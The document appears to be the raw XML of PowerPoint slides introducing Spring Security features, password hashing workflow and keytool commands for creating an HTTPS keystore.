              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Digest Access Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This feature allows us to make authentication process more secure than Basic Access Authentication. It asks to the browser to confirm the identity of the user before sending sensitive data over the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember-me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring Security supports this feature with the help of HTTP Cookies. It remember to the user and avoid login again from the same machine until the user logout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Spring Security Features</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12602225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342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Form Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In this process, web form collect and authenticate user credentials from the web browser. Spring Security supports it while we want to implement web form authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring Security provides the this feature to authorize the user before accessing resources. It allows developers to define access policies against the resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software Localization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This feature allows us to make application user interface in any language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Spring Security Features</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39129092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342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring provides this feature for HTTP authorization of web request URLs using Apache Ant paths or regular expressions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
              <a:t>Spring Security Features</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20799400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342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OAuth 2.0 Login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This feature provides the facility to the user to login into the application by using their existing account at GitHub or Google. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>feature is implemented by using the Authorization Code Grant that is specified in the OAuth 2.0 Authorization Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reactive Support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From version Spring Security 5.0, it provides reactive programming and reactive web runtime support and even, we can integrate with Spring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebFlux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Features added in Spring Security 5.0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25260186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342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modernized Password Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="574675" lvl="1" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring Security 5.0 introduced new Password encoder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DelegatingPasswordEncoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> which is more modernize and solve all the problems of previous encoder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NoOpPasswordEncoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Features added in Spring Security 5.0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42513291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500" r="12500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="7010400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23562153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9103565" cy="4408119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27968692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t="2593" r="12500" b="5556"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="560238"/>
            <a:ext cx="9144000" cy="6299200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32894932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r="12500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38321565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r="12500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="857250"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26711318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The general workflow for account registration and authentication in a hash-based account system is as follows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user creates an account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Their password is hashed and stored in the database. At no point is the plain-text (unencrypted) password ever written to the hard drive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the user attempts to login, the hash of the password they entered is checked against the hash of their real password (retrieved from the database).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the hashes match, the user is granted access. If not, the user is told they entered invalid login credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steps 3 and 4 repeat every time someone tries to login to their account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In step 4, never tell the user if it was the username or password they got wrong. Always display a generic message like "Invalid username or password." This prevents attackers from enumerating valid usernames without knowing their passwords.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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37613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t="4075" r="12500" b="5555"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="152400"/>
            <a:ext cx="9067800" cy="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32439981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r="12500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9118121" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23932185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333" t="2593" r="12500" b="5556"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15977" y="0"/>
            <a:ext cx="9128023" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28936674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500" r="12500"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9344441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Creating a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> File and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Password for HTTPS Connections</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>genkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -alias tomcat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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-location -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>storepass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a: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r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>genkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noprompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -alias &lt;your-alias&gt;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&lt;your-file-name&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;your-password&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>storepass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;your-password&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "CN=&lt;your-cert-name&gt;, OU=&lt;your-organization-unit&gt;, O=&lt;your-organization&gt;,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    L=&lt;your-location&gt;, ST=&lt;state&gt;, C=&lt;two-letter-country-code&gt;"</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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endParaRPr lang="en-IN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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5414704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Creating a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> File and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Password for HTTPS Connections</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
